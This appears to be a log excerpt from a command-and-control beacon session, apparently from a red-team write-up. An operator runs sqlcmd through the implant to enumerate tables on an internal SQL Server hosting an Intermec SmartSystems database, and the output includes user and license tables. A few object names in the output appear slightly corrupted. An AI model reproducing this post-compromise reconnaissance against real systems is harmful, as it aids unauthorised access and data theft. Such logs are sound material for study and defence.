Intermec sys dm_os_memory_pools VIEW NULL
Intermec sys dm_os_nodes VIEW NULL
Intermec sys dm_os_performance_counters VIEW NULL
Intermec sys dm_os_process_memory VIEW NULL
Intermec sys dm_os_ring_buffers VIEW NULL
Intermec sys dm_os_schedulers VIEW NULL
Intermec sys dm_os_spinlock_stats VIEW NULL
Intermec sys dm_os_stacks VIEW NULL
Intermec sys dm_os_sublatches VIEW NULL
Intermec sys dm_os_sys_info VIEW NULL
Intermec sys dm_os_sys_memory VIEW NULL
Intermec sys dm_os_tasks VIEW NULL
Intermec sys dm_os_threads VIEW NULL
Intermec sys dm_os_virtual_address_dump VIEW NULL
Intermec sys dm_os_wait_stats VIEW NULL
Intermec sys dm_os_waiting_tasks VIEW NULL
Intermec sys dm_os_windows_info VIEW NULL
Intermec sys dm_os_worker_local_storage VIEW NULL
Intermec sys dm_os_workers VIEW NULL
Intermec sys dm_qn_subscriptions VIEW NULL
Intermec sys dm_repl_articles VIEW NULL
Intermec sys dm_repl_schemas VIEW NULL
Intermec sys dm_repl_tranhash VIEW NULL
Intermec sys dm_repl_traninfo VIEW NULL
Intermec sys dm_resource_governor_configuration VIEW NULL
Intermec sys dm_resource_governor_resource_pools VIEW NULL
Intermec sys dm_resource_governor_workload_groups VIEW NULL
Intermec sys dm_server_audit_status VIEW NULL
Intermec sys dm_server_memory_dumps VIEW NULL
Intermec sys dm_server_registry VIEW NULL
Intermec sys dm_server_services VIEW NULL
Intermec sys dm_tran_active_snapshot_database_transactions VIEW NULL
Intermec sys dm_tran_active_transactions VIEW NULL
Intermec sys dm_tran_commit_table VIEW NULL
Intermec sys dm_tran_current_snapshot VIEW NULL
Intermec sys dm_tran_current_transaction VIEW NULL
Intermec sys dm_tran_database_transactions VIEW NULL
Intermec sys dm_tran_locks VIEW NULL
Intermec sys dm_tran_session_transactions VIEW NULL
Intermec sys dm_tran_top_version_generators VIEW NULL
Intermec sys dm_tran_transactions_snapshot VIEW NULL
Intermec sys dm_tran_version_store VIEW NULL
Intermec sys dm_xe_map_values VIEW NULL
Intermec sys dm_xe_object_columns VIEW NULL
Intermec sys dm_xe_objects VIEW NULL
Intermec sys dm_xe_packages VIEW NULL
Intermec sys dm_xe_session_event_actions VIEW NULL
Intermec sys dm_xe_session_events VIEW NULL
Intermec sys dm_xe_session_object_columns VIEW NULL
Intermec sys dm_xe_session_targets VIEW NULL
Intermec sys dm_xe_sessions VIEW NULL
Intermec sys endpoint_webmethods VIEW NULL
Intermec sys endpoints VIEW NULL
Intermec sys event_notification_event_types VIEW NULL
Intermec sys event_notifications VIEW NULL
Intermec sys events VIEW NULL
Intermec sys extended_procedures VIEW NULL
Intermec sys extended_properties VIEW NULL
Intermec sys filegroups VIEW NULL
Intermec sys foreign_key_columns VIEW NULL
Intermec sys foreign_keys VIEW NULL
Intermec sys fulltext_catalogs VIEW NULL
Intermec sys fulltext_document_types VIEW NULL
Intermec sys fulltext_index_catalog_usages VIEW NULL
Intermec sys fulltext_index_columns VIEW NULL
Intermec sys fulltext_index_fragments VIEW NULL
Intermec sys fulltext_index_indexes VIEW NULL
Intermec sys fulltext_languages VIEW NULL
Intermec sys fulltext_stoplists VIEW NULL
Intermec sys fulltext_stopwords VIEW NULL
Intermec sys fulltext_system_stopwords VIEW NULL
Intermec sys function_order_columns VIEW NULL
Intermec sys http_endpoints VIEW NULL
Intermec sys identity_columns VIEW NULL
Intermec sys index_columns VIEW NULL
Intermec sys indexes VIEW NULL
Intermec sys internal_tables VIEW NULL
Intermec sys key_constraints VIEW NULL
Intermec sys key_encryptions VIEW NULL
Intermec sys linked_logins VIEW NULL
Intermec sys login_token VIEW NULL
Intermec sys master_files VIEW NULL
Intermec sys master_key_passwords VIEW NULL
Intermec sys message_type_xml_schema_collection_usages VIEW NULL
Intermec sys messages VIEW NULL
Intermec sys module_assembly_usages VIEW NULL
Intermec sys numbered_procedure_parameters VIEW NULL
Intermec sys numbered_procedures VIEW NULL
Intermec sys objects VIEW NULL
Intermec sys openkeys VIEW NULL
Intermec sys parameter_type_usages VIEW NULL
Intermec sys parameter_xml_schema_collection_usages VIEW NULL
Intermec sys parameters VIEW NULL
Intermec sys partition_functions VIEW NULL
Intermec sys partition_parameters VIEW NULL
Intermec sys partition_range_values VIEW NULL
Intermec sys partition_schemes VIEW NULL
Intermec sys partitions VIEW NULL
Intermec sys plan_guides VIEW NULL
Intermec sys procedures VIEW NULL
Intermec sys remote_logins VIEW NULL
Intermec sys remote_service_bindings VIEW NULL
Intermec sys resource_governor_configuration VIEW NULL
Intermec sys resource_governor_resource_pools VIEW NULL
Intermec sys resource_governor_workload_groups VIEW NULL
Intermec sys routes VIEW NULL
Intermec sys schemas VIEW NULL
Intermec sys securable_classes VIEW NULL
Intermec sys server_assembly_modules VIEW NULL
Intermec sys server_audit_specification_details VIEW NULL
Intermec sys server_audit_specifications VIEW NULL
Intermec sys server_audits VIEW NULL
Intermec sys server_event_notifications VIEW NULL
Intermec sys server_event_session_actions VIEW NULL
Intermec sys server_event_session_events VIEW NULL
Intermec sys server_event_session_fields VIEW NULL
Intermec sys server_event_session_targets VIEW NULL
Intermec sys server_event_sessions VIEW NULL
Intermec sys server_events VIEW NULL
Intermec sys server_file_audits VIEW NULL
Intermec sys server_permissions VIEW NULL
Intermec sys server_principal_credentials VIEW NULL
Intermec sys server_principals VIEW NULL
Intermec sys server_role_members VIEW NULL
Intermec sys server_sql_modules VIEW NULL
Intermec sys server_trigger_events VIEW NULL
Intermec sys server_triggers VIEW NULL
Intermec sys servers VIEW NULL
Intermec sys service_broker_endpoints VIEW NULL
Intermec sys service_contract_message_usages VIEW NULL
Intermec sys service_contract_usages VIEW NULL
Intermec sys service_contracts VIEW NULL
Intermec sys service_message_types VIEW NULL
Intermec sys service_queue_usages VIEW NULL
Intermec sys service_queues VIEW NULL
Intermec sys services VIEW NULL
Intermec sys soap_endpoints VIEW NULL
Intermec sys spatial_index_tessellations VIEW NULL
Intermec sys spatial_indexes VIEW NULL
Intermec sys spatial_reference_systems VIEW NULL
Intermec sys sql_dependencies VIEW NULL
Intermec sys sql_expression_dependencies VIEW NULL
Intermec sys sql_logins VIEW NULL
Intermec sys sql_modules VIEW NULL
Intermec sys stats VIEW NULL
Intermec sys stats_columns VIEW NULL
Intermec sys symmetric_keys VIEW NULL
Intermec sys synonyms VIEW NULL
Intermec sys sysaltfiles VIEW NULL
Intermec sys syscacheobjects VIEW NULL
Intermec sys syscharsets VIEW NULL
Intermec sys syscolumns VIEW NULL
Intermec sys syscomments VIEW NULL
Intermec sys sysconfigures VIEW NULL
Intermec sys sysconstraints VIEW NULL
Intermec sys syscurconfigs VIEW NULL
Intermec sys syscursorcolumns VIEW NULL
Intermec sys syscursorrefs VIEW NULL
Intermec sys syscursors VIEW NULL
Intermec sys syscursortables VIEW NULL
Intermec sys sysdatabases VIEW NULL
Intermec sys sysdepends VIEW NULL
Intermec sys sysdevices VIEW NULL
Intermec sys sysfilegroups VIEW NULL
Intermec sys sysfiles VIEW NULL
Intermec sys sysforeignkeys VIEW NULL
Intermec sys sysfulltextcatalogs VIEW NULL
Intermec sys sysindexes VIEW NULL
Intermec sys sysindexkeys VIEW NULL
Intermec sys syslanguages VIEW NULL
Intermec sys syslockinfo VIEW NULL
Intermec sys syslogins VIEW NULL
Intermec sys sysmembers VIEW NULL
Intermec sys sysmessages VIEW NULL
Intermec sys sysobjects VIEW NULL
Intermec sys sysoledbusers VIEW NULL
Intermec sys sysopentapes VIEW NULL
Intermec sys sysperfinfo VIEW NULL
Intermec sys syspermissions VIEW NULL
Intermec sys sysprocesses VIEW NULL
Intermec sys sysprotects VIEW NULL
Intermec sys sysreferences VIEW NULL
Intermec sys sysremotelogins VIEW NULL
Intermec syss sysservers VIEW NULL
Intermec sys system_columns VIEW NULL
Intermec sys system_components_surface_area_configuration VIEW NULL
Intermec sys system_internals_allocation_units VIEW NULL
Intermec sys system_internals_partition_columns VIEW NULL
Intermec sys system_internals_partitions VIEW NULL
Intermec sys system_objects VIEW NULL
Intermec sys system_parameters VIEW NULL
Intermec sys system_sql_modules VIEW NULL
Intermec sys system_views VIEW NULL
Intermec sys systypes VIEW NULL
Intermec sys sysusers VIEW NULL
Intermec sys table_types VIEW NULL
Intermec sys tables VIEW NULL
Intermec sys tcp_endpoints VIEW NULL
Intermec sys trace_categories VIEW NULL
Intermec sys trace_columns VIEW NULL
Intermec sys trace_event_bindings VIEW NULL
Intermec sys trace_events VIEW NULL
Intermec sys trace_subclass_values VIEW NULL
Intermec sys traces VIEW NULL
Intermec sys transmission_queue VIEW NULL
Intermec sys trigger_event_types VIEW NULL
Intermec sys trigger_events VIEW NULL
Intermec sys triggers VIEW NULL
Intermec sys type_assembly_usages VIEW NULL
Intermec sys types VIEW NULL
Intermec sys user_token VIEW NULL
Intermec sys via_endpoints VIEW NULL
Intermec sys views VIEW NULL
Intermec sys xml_indexes VIEW NULL
Intermec sys xml_schema_attributes VIEW NULL
Intermec sys xml_schema_collections VIEW NULL
Intermec sys xml_schema_component_placements VIEW NULL
Intermec sys xml_schema_components VIEW NULL
Intermec sys xml_schema_elements VIEW NULL
Intermec sys xml_schema_facets VIEW NULL
Intermec sys xml_schema_model_groups VIEW NULL
Intermec sys xml_schema_namespaces VIEW NULL
Intermec sys xml_schema_types VIEW NULL
Intermec sys xml_schema_wildcard_namespaces VIEW NULL
Intermec sys xml_schema_wildcards VIEW NULL

(358 rows affected)
```
 
```
beacon> shell sqlcmd -S 89.0.0.121,1433 -E -Q "use SmartSystems; exec sp_tables" -W
[*] Tasked beacon to run: sqlcmd -S 89.0.0.121,1433 -E -Q "use SmartSystems; exec sp_tables" -W
[+] host called home, sent: 100 bytes
[+] received output:
Changed database context to 'SmartSystems'.
TABLE_QUALIFIER TABLE_OWNER TABLE_NAME TABLE_TYPE
--------------- ----------- ---------- ---------- -------
SmartSystems dbo AssetHistory_TBL TABLE NULL
SmartSystems dbo AssetMessageMappings_TBL TABLE NULL
SmartSystems dbo BundleInfo_TBL TABLE NULL
SmartSystems dbo ClientLicenses_TBL TABLE NULL
SmartSystems dbo ComponentsSupportedByDataFiles_TBL TABLE NULL
SmartSystems dbo Customers_TBL TABLE NULL
SmartSystems dbo DatabaseInfo_TBL TABLE NULL
SmartSystems dbo DeviceAliases_TBL TABLE NULL
SmartSystems dbo DeviceDetails_TBL TABLE NULL
SmartSystems dbo Devices_TBL TABLE NULL
SmartSystems dbo Devices2Devices_TBL TABLE NULL
SmartSystems dbo DeviceStatistics_TBL TABLE NULL
SmartSystems dbo DeviceTypes_TBL TABLE NULL
SmartSystems dbo DeviceTypeSpecificTools_TBL TABLE NULL
SmartSystems dbo DeviceTypeXML_TBL TABLE NULL
SmartSystems dbo DragItems_TBL TABLE NULL
SmartSystems dbo DragItems2Groups_TBL TABLE NULL
SmartSystems dbo DragItemStates_TBL TABLE NULL
SmartSystems dbo DragItemTypes_TBL TABLE NULL
SmartSystems dbo EmailNotificationLog_TBL TABLE NULL
SmartSystems dbo EmailNotifications_TBL TABLE NULL
SmartSystems dbo ErrorLog_TBL TABLE NULL
SmartSystems dbo ExportedLicenses_TBL TABLE NULL
SmartSystems dbo Family_TBL TABLE NULL
SmartSystems dbo GlobalSettings_TBL TABLE NULL
SmartSystems dbo Groups_TBL TABLE NULL
SmartSystems dbo Groups2Devices_TBL TABLE NULL
SmartSystems dbo GroupTypes_TBL TABLE NULL
SmartSystems dbo Icons_TBL TABLE NULL
SmartSystems dbo LicenseFeatureStatistics_TBL TABLE NULL
SmartSystems dbo LicenseLookup_TBL TABLE NULL
SmartSystems dbo Licenses_TBL TABLE NULL
SmartSystems dbo MacroVisionLicenses_TBL TABLE NULL
SmartSystems dbo Models_TBL TABLE NULL
SmartSystems dbo RTWStates_TBL TABLE NULL
SmartSystems dbo Servers_TBL TABLE NULL
SmartSystems dbo SupportedUserDefinedTools_TBL TABLE NULL
SmartSystems dbo TFMxRef_TBL TABLE NULL
SmartSystems dbo Trends_TBL TABLE NULL
SmartSystems dbo UserLevels_TBL TABLE NULL
SmartSystems dbo Users_TBL TABLE NULL
SmartSystems dbo AssetHistory VIEW NULL
SmartSystems dbo AssetMessageMappings VIEW NULL
SmartSystems dbo AttachedDevices VIEW NULL
SmartSystems dbo Batteries VIEW NULL
SmartSystems dbo BundleInfo VIEW NULL
SmartSystems dbo BundleTFMs VIEW NULL
SmartSystems dbo ComponentsSupportedByDataFiles VIEW NULL
SmartSystems dbo ComputerHealth VIEW NULL
SmartSystems dbo DBSize VIEW NULL
SmartSystems dbo DeviceAliases VIEW NULL
SmartSystems dbo DeviceDetails VIEW NULL
SmartSystems dbo DeviceLicenses VIEW NULL
SmartSystems dbo Devices VIEW NULL
SmartSystems dbo DeviceStatistics VIEW NULL
SmartSystems dbo DeviceTypeSpecificTools VIEW NULL
SmartSystems dbo DragItems VIEW NULL
SmartSystems dbo DragItems2Groups VIEW NULL
SmartSystems dbo DragItemStates VIEW NULL
SmartSystems dbo DragItemTypes VIEW NULL
SmartSystems dbo ErrorLog VIEW NULL
SmartSystems dbo ExportedLicenses VIEW NULL
SmartSystems dbo FeatureUsage VIEW NULL
SmartSystems dbo Groups VIEW NULL
SmartSystems dbo GUI_DeviceDetails VIEW NULL
SmartSystems dbo Icons VIEW NULL
SmartSystems dbo LicenseCounts VIEW NULL
SmartSystems dbo LicenseFeatureStatistics VIEW NULL
SmartSystems dbo Licenses VIEW NULL
SmartSystems dbo MacroVisionLicenses VIEW NULL
SmartSystems dbo ProvisioningTFMs VIEW NULL
SmartSystems dbo RTWStates VIEW NULL
SmartSystems dbo SupportedUserDefinedTools VIEW NULL
SmartSystems dbo TypeFamilyModel VIEW NULL
SmartSystems dbo UserLevels VIEW NULL
SmartSystems dbo Users VIEW NULL
SmartSystems INFORMATION_SCHEMA CHECK_CONSTRAINTS VIEW NULL
SmartSystems INFORMATION_SCHEMA COLUMN_DOMAIN_USAGE VIEW NULL
SmartSystems INFORMATION_SCHEMA COLUMN_PRIVILEGES VIEW NULL
SmartSystems INFORMATION_SCHEMA COLUMNS VIEW NULL
SmartSystems INFORMATION_SCHEMA CONSTRAINT_COLUMN_USAGE VIEW NULL
SmartSystems INFORMATION_SCHEMA CONSTRAINT_TABLE_USAGE VIEW NULL
SmartSystems INFORMATION_SCHEMA DOMAIN_CONSTRAINTS VIEW NULL
SmartSystems INFORMATION_SCHEMA DOMAINS VIEW NULL
SmartSystems INFORMATION_SCHEMA KEY_COLUMN_USAGE VIEW NULL
SmartSystems INFORMATION_SCHEMA PARAMETERS VIEW NULL
SmartSystems INFORMATION_SCHEMA REFERENTIAL_CONSTRAINTS VIEW NULL
SmartSystems INFORMATION_SCHEMA ROUTINE_COLUMNS VIEW NULL
SmartSystems INFORMATION_SCHEMA ROUTINES VIEW NULL
SmartSystems INFORMATION_SCHEMA SCHEMATA VIEW NULL
SmartSystems INFORMATION_SCHEMA TABLE_CONSTRAINTS VIEW NULL
SmartSystems INFORMATION_SCHEMA TABLE_PRIVILEGES VIEW NULL
SmartSystems INFORMATION_SCHEMA TABLES VIEW NULL
SmartSystems INFORMATION_SCHEMA VIEW_COLUMN_USAGE VIEW NULL
SmartSystems INFORMATION_SCHEMA VIEW_TABLE_USAGE VIEW NULL
SmartSystems INFORMATION_SCHEMA VIEWS VIEW NULL
SmartSystems sys all_columns VIEW NULL
SmartSystems sys all_objects VIEW NULL
SmartSystems sys all_parameters VIEW NULL
SmartSystems sys all_sql_modules VIEW NULL
SmartSystems sys all_views VIEW NULL
SmartSystems sys allocation_units VIEW NULL
SmartSystems sys assemblies VIEW NULL
SmartSystems sys assembly_files VIEW NULL
SmartSystems sys assembly_modules VIEW NULL
SmartSystems sys assembly_references VIEW NULL
SmartSystems sys assembly_types VIEW NULL
SmartSystems sys asymmetric_keys VIEW NULL
SmartSystems sys backup_devices VIEW NULL
SmartSystems sys certificates VIEW NULL
SmartSystems sys change_tracking_databases VIEW NULL
SmartSystems sys change_tracking_tables VIEW NULL
SmartSystems sys check_constraints VIEW NULL
SmartSystems sys column_type_usages VIEW NULL
SmartSystems sys column_xml_schema_collection_usages VIEW NULL
SmartSystems sys columns VIEW NULL
SmartSystems sys computed_columns VIEW NULL
SmartSystems sys configurations VIEW NULL
SmartSystems sys conversation_endpoints VIEW NULL
SmartSystems sys conversation_groups VIEW NULL
SmartSystems sys conversation_priorities VIEW NULL
SmartSystems sys credentials VIEW NULL
SmartSystems sys crypt_properties VIEW NULL
SmartSystems sys cryptographic_providers VIEW NULL
SmartSystems sys data_spaces VIEW NULL
SmartSystems sys database_audit_specification_details VIEW NULL
SmartSystems sys database_audit_specifications VIEW NULL
SmartSystems sys database_files VIEW NULL
SmartSystems sys database_mirroring VIEW NULL
SmartSystems sys database_mirroring_endpoints VIEW NULL
SmartSystems sys database_mirroring_witnesses VIEW NULL
SmartSystems sys database_permissions VIEW NULL
SmartSystems sys database_principal_aliases VIEW NULL
SmartSystems sys database_principal_aliases VIEW NULL
SmartSystems sys database_recovery_status VIEW NULL
SmartSystems sys database_role_members VIEW NULL
SmartSystems sys databases VIEW NULL
SmartSystems sys default_constraints VIEW NULL
SmartSystems sys destination_data_spaces VIEW NULL
SmartSystems sys dm_audit_actions VIEW NULL
SmartSystems sys dm_audit_class_type_map VIEW NULL
SmartSystems sys dm_broker_activated_tasks VIEW NULL
SmartSystems sys dm_broker_connections VIEW NULL
SmartSystems sys dm_broker_forwarded_messages VIEW NULL
SmartSystems sys dm_broker_queue_monitors VIEW NULL
SmartSystems sys dm_cdc_errors VIEW NULL
SmartSystems sys dm_cdc_log_scan_sessions VIEW NULL
SmartSystems sys dm_clr_appdomains VIEW NULL
SmartSystems sys dm_clr_loaded_assemblies VIEW NULL
SmartSystems sys dm_clr_properties VIEW NULL
SmartSystems sys dm_clr_tasks VIEW NULL
SmartSystems sys dm_cryptographic_provider_properties VIEW NULL
SmartSystems sys dm_database_encryption_keys VIEW NULL
SmartSystems sys dm_db_file_space_usage VIEW NULL
SmartSystems sys dm_db_index_usage_stats VIEW NULL
SmartSystems sys dm_db_mirroring_auto_page_repair VIEW NULL
SmartSystems sys dm_db_mirroring_connections VIEW NULL
SmartSystems sys dm_db_mirroring_past_actions VIEW NULL
SmartSystems sys dm_db_missing_index_details VIEW NULL
SmartSystems sys dm_db_missing_index_group_stats VIEW NULL
SmartSystems sys dm_db_missing_index_groups VIEW NULL
SmartSystems sys dm_db_partition_stats VIEW NULL
SmartSystems sys dm_db_persisted_sku_features VIEW NULL
SmartSystems sys dm_db_script_level VIEW NULL
SmartSystems sys dm_db_session_space_usage VIEW NULL
SmartSystems sys dm_db_task_space_usage VIEW NULL
SmartSystems sys dm_exec_background_job_queue VIEW NULL
SmartSystems sys dm_exec_background_job_queue_stats VIEW NULL
SmartSystems sys dm_exec_cached_plans VIEW NULL
SmartSystems sys dm_exec_connections VIEW NULL
SmartSystems sys dm_exec_procedure_stats VIEW NULL
SmartSystems sys dm_exec_query_memory_grants VIEW NULL
SmartSystems sys dm_exec_query_optimizer_info VIEW NULL
SmartSystems sys dm_exec_query_resource_semaphores VIEW NULL
SmartSystems sys dm_exec_query_stats VIEW NULL
SmartSystems sys dm_exec_query_transformation_stats VIEW NULL
SmartSystems sys dm_exec_requests VIEW NULL
SmartSystems sys dm_exec_sessions VIEW NULL
SmartSystems sys dm_exec_trigger_stats VIEW NULL
SmartSystems sys dm_filestream_file_io_handles VIEW NULL
SmartSystems sys dm_filestream_file_io_requests VIEW NULL
SmartSystems sys dm_fts_active_catalogs VIEW NULL
SmartSystems sys dm_fts_fdhosts VIEW NULL
SmartSystems sys dm_fts_index_population VIEW NULL
SmartSystems sys dm_fts_memory_buffers VIEW NULL
SmartSystems sys dm_fts_memory_pools VIEW NULL
SmartSystems sys dm_fts_outstanding_batches VIEW NULL
SmartSystems sys dm_fts_population_ranges VIEW NULL
SmartSystems sys dm_io_backup_tapes VIEW NULL
SmartSystems sys dm_io_cluster_shared_drives VIEW NULL
SmartSystems sys dm_io_pending_io_requests VIEW NULL
SmartSystems sys dm_os_buffer_descriptors VIEW NULL
SmartSystems sys dm_os_child_instances VIEW NULL
SmartSystems sys dm_os_cluster_nodes VIEW NULL
SmartSystems sys dm_os_dispatcher_pools VIEW NULL
SmartSystems sys dm_os_dispatchers VIEW NULL
SmartSystems sys dm_os_hosts VIEW NULL
SmartSystems sys dm_os_latch_stats VIEW NULL
SmartSystems sys dm_os_loaded_modules VIEW NULL
SmartSystems sys dm_os_memory_allocations VIEW NULL
SmartSystems sys dm_os_memory_brokers VIEW NULL
SmartSystems sys dm_os_memory_cache_clock_hands VIEW NULL
SmartSystems sys dm_os_memory_cache_counters VIEW NULL
SmartSystems sys dm_os_memory_cache_entries VIEW NULL
SmartSystems sys dm_os_memory_cache_hash_tables VIEW NULL
SmartSystems sys dm_os_memory_clerks VIEW NULL
SmartSystems sys dm_os_memory_node_access_stats VIEW NULL
SmartSystems sys dm_os_memory_nodes VIEW NULL
SmartSystems sys dm_os_memory_objects VIEW NULL
SmartSystems sys dm_os_memory_pools VIEW NULL
SmartSystems sys dm_os_nodes VIEW NULL
SmartSystems sys dm_os_performance_counters VIEW NULL
SmartSystems sys dm_os_process_memory VIEW NULL
SmartSystems sys dm_os_ring_buffers VIEW NULL
SmartSystems sys dm_os_schedulers VIEW NULL
SmartSystems sys dm_os_spinlock_stats VIEW NULL
SmartSystems sys dm_os_stacks VIEW NULL
SmartSystems sys dm_os_sublatches VIEW NULL
SmartSystems sys dm_os_sys_info VIEW NULL
SmartSystems sys dm_os_sys_memory VIEW NULL
SmartSystems sys dm_os_tasks VIEW NULL
SmartSystems sys dm_os_threads VIEW NULL
SmartSystems sys dm_os_virtual_address_dump VIEW NULL
SmartSystems sys dm_os_wait_stats VIEW NULL
SmartSystems sys dm_os_waiting_tasks VIEW NULL
SmartSystems sys dm_os_windows_info VIEW NULL
SmartSystems sys dm_os_worker_local_storage VIEW NULL
SmartSystems sys dm_os_workers VIEW NULL
SmartSystems sys dm_qn_subscriptions VIEW NULL
SmartSystems sys dm_repl_articles VIEW NULL
SmartSystems sys dm_repl_schemas VIEW NULL
SmartSystems sys dm_repl_tranhash VIEW NULL
SmartSystems sys dm_repl_traninfo VIEW NULL
SmartSystems sys dm_resource_governor_configuration VIEW NULL
SmartSystems sys dm_resource_governor_resource_pools VIEW NULL
SmartSystems sys dm_resource_governor_workload_groups VIEW NULL
SmartSystems sys dm_server_audit_status VIEW NULL
SmartSystems sys dm_server_memory_dumps VIEW NULL
SmartSystems sys dm_server_registry VIEW NULL
SmartSystems sys dm_server_services VIEW NULL
SmartSystems sys dm_tran_active_snapshot_database_transactions VIEW NULL
SmartSystems sys dm_tran_active_transactions VIEW NULL
SmartSystems sys dm_tran_commit_table VIEW NULL
SmartSystems sys dm_tran_current_snapshot VIEW NULL
SmartSystems sys dm_an_tran_current_transaction VIEW NULL
SmartSystems sys dm_tran_database_transactions VIEW NULL
SmartSystems sys dm_tran_locks VIEW NULL
SmartSystems sys dm_an_tran_session_transactions VIEW NULL
SmartSystems sys dm_tran_top_version_generators VIEW NULL
SmartSystems sys dm_tran_transactions_snapshot VIEW NULL
SmartSystems sys dm_tran_version_store VIEW NULL
SmartSystems sys dm_xe_map_values VIEW NULL
SmartSystems sys dm_xe_object_columns VIEW NULL
SmartSystems sys dm_xe_objects VIEW NULL
SmartSystems sys dm_xe_packages VIEW NULL
SmartSystems sys dm_xe_session_event_actions VIEW NULL
SmartSystems sys dm_xe_session_events VIEW NULL
SmartSystems sys dm_xe_session_object_columns VIEW NULL
SmartSystems sys dm_xe_session_targets VIEW NULL
SmartSystems sys dm_xe_sessions VIEW NULL
SmartSystems sys endpoint_webmethods VIEW NULL
SmartSystems sys endpoints VIEW NULL
SmartSystems sys event_notification_event_types VIEW NULL
SmartSystems sys event_notifications VIEW NULL
SmartSystems sys events VIEW NULL
SmartSystems sys extended_procedures VIEW NULL
SmartSystems sys extended_properties VIEW NULL
SmartSystems sys filegroups VIEW NULL
SmartSystems sys foreign_key_columns VIEW NULL
SmartSystems sys foreign_keys VIEW NULL
SmartSystems sys fulltext_catalogs VIEW NULL
SmartSystems sys fulltext_document_types VIEW NULL
SmartSystems sys fulltext_index_catalog_usages VIEW NULL
SmartSystems sys fulltext_index_columns VIEW NULL
SmartSystems sys fulltext_index_fragments VIEW NULL
SmartSystems sys fulltext_index_indexes VIEW NULL
SmartSystems sys fulltext_languages VIEW NULL
SmartSystems sys fulltext_stoplists VIEW NULL
SmartSystems sys fulltext_stopwords VIEW NULL
SmartSystems sys fulltext_system_stopwords VIEW NULL
SmartSystems sys function_order_columns VIEW NULL
SmartSystems sys http_endpoints VIEW NULL
SmartSystems sys identity_columns VIEW NULL
SmartSystems sys index_columns VIEW NULL
SmartSystems sys indexes VIEW NULL
SmartSystems sys internal_tables VIEW NULL
SmartSystems sys key_constraints VIEW NULL
SmartSystems sys key_encryptions VIEW NULL
SmartSystems sys linked_logins VIEW NULL
SmartSystems sys login_token VIEW NULL
SmartSystems sys master_files VIEW NULL
SmartSystems sys master_key_passwords VIEW NULL
SmartSystems sys message_type_xml_schema_collection_usages VIEW NULL
SmartSystems sys messages VIEW NULL
SmartSystems sys module_assembly_usages VIEW NULL
SmartSystems sys numbered_procedure_parameters VIEW NULL
SmartSystems sys numbered_procedures VIEW NULL
SmartSystems sys objects VIEW NULL
SmartSystems sys openkeys VIEW NULL
SmartSystems sys parameter_type_usages VIEW NULL
SmartSystems sys parameter_xml_schema_collection_usages VIEW NULL
SmartSystems sys parameters VIEW NULL
SmartSystems sys partition_functions VIEW NULL
SmartSystems sys partition_parameters VIEW NULL
SmartSystems sys partition_range_values VIEW NULL
SmartSystems sys partition_schemes VIEW NULL
SmartSystems sys partitions VIEW NULL
SmartSystems sys plan_guides VIEW NULL
SmartSystems sys procedures VIEW NULL
SmartSystems sys remote_logins VIEW NULL
SmartSystems sys remote_service_bindings VIEW NULL
SmartSystems sys resource_governor_configuration VIEW NULL
SmartSystems sys resource_governor_resource_pools VIEW NULL
SmartSystems sys resource_governor_workload_groups VIEW NULL
SmartSystems sys routes VIEW NULL
SmartSystems sys schemas VIEW NULL
SmartSystems sys securable_classes VIEW NULL
SmartSystems sys server_assembly_modules VIEW NULL
SmartSystems sys server_audit_specification_details VIEW NULL
SmartSystems sys server_audit_specifications VIEW NULL
SmartSystems sys server_audits VIEW NULL
SmartSystems sys server_event_notifications VIEW NULL
SmartSystems sys server_event_session_actions VIEW NULL
SmartSystems sys server_event_session_events VIEW NULL
SmartSystems sys server_event_session_fields VIEW NULL
SmartSystems sys server_event_session_targets VIEW NULL
SmartSystems sys server_event_sessions VIEW NULL
SmartSystems sys server_events VIEW NULL
SmartSystems sys server_file_audits VIEW NULL
SmartSystems sys server_permissions VIEW NULL
SmartSystems sys server_principal_credentials VIEW NULL
SmartSystems sys server_principals VIEW NULL
SmartSystems sys server_role_members VIEW NULL
SmartSystems sys server_sql_modules VIEW NULL
SmartSystems sys server_trigger_events VIEW NULL
SmartSystems sys server_triggers VIEW NULL
SmartSystems sys servers VIEW NULL
SmartSystems sys service_broker_endpoints VIEW NULL
SmartSystems sys service_contract_message_usages VIEW NULL
SmartSystems sys service_contract_usages VIEW NULL
SmartSystems sys service_contracts VIEW NULL
SmartSystems sys service_message_types VIEW NULL
SmartSystems sys service_queue_usages VIEW NULL
SmartSystems sys service_queues VIEW NULL
SmartSystems sys services VIEW NULL
SmartSystems sys soap_endpoints VIEW NULL
SmartSystems sys spatial_index_tessellations VIEW NULL
SmartSystems sys spatial_indexes VIEW NULL
SmartSystems sys spatial_reference_systems VIEW NULL
SmartSystems sys sql_dependencies VIEW NULL
SmartSystems sys sql_expression_dependencies VIEW NULL
SmartSystems sys sql_logins VIEW NULL
SmartSystems sys sql_modules VIEW NULL
SmartSystems sys stats VIEW NULL
SmartSystems sys stats_columns VIEW NULL
SmartSystems sys symmetric_keys VIEW NULL
SmartSystems sys synonyms VIEW NULL
SmartSystems sys sysaltfiles VIEW NULL
SmartSystems sys syscacheobjects VIEW NULL
SmartSystems sys syscharsets VIEW NULL
SmartSystems sys syscolumns VIEW NULL
SmartSystems sys syscomments VIEW NULL
SmartSystems sysconfigures VIEW NULL
SmartSystems sysconstraints VIEW NULL
SmartSystems sys syscurconfigs VIEW NULL
SmartSystems sys syscursorcolumns VIEW NULL
SmartSystems sys syscursorrefs VIEW NULL
SmartSystems sys syscursors VIEW NULL
SmartSystems sys syscursortables VIEW NULL
SmartSystems sys sysdatabases VIEW NULL
SmartSystems sysdepends VIEW NULL
SmartSystems sys sysdevices VIEW NULL
SmartSystems sys sysfilegroups VIEW NULL
SmartSystems sys sysfiles VIEW NULL
SmartSystems sys sysforeignkeys VIEW NULL
SmartSystems sys sysfulltextcatalogs VIEW NULL
SmartSystems sys sysindexes VIEW NULL
SmartSystems sys sysindexkeys VIEW NULL
SmartSystems sys syslanguages VIEW NULL
SmartSystems sys syslockinfo VIEW NULL
SmartSystems sys syslogins VIEW NULL
SmartSystems sys sysmembers VIEW NULL
SmartSystems sys sysmessages VIEW NULL
SmartSystems sys sysobjects VIEW NULL
SmartSystems sys sysoledbusers VIEW NULL
SmartSystems sys sysopentapes VIEW NULL
SmartSystems sys sysperfinfo VIEW NULL
SmartSystems sys syspermissions VIEW NULL
SmartSystems sys sysprocesses VIEW NULL
SmartSystems sys sysprotects VIEW NULL
SmartSystems sys sysreferences VIEW NULL
SmartSystems sys sysremotelogins VIEW NULL
SmartSystems syss sysservers VIEW NULL
SmartSystems sys system_columns VIEW NULL
SmartSystems sys system_components_surface_area_configuration VIEW NULL
SmartSystems sys system_internals_allocation_units VIEW NULL
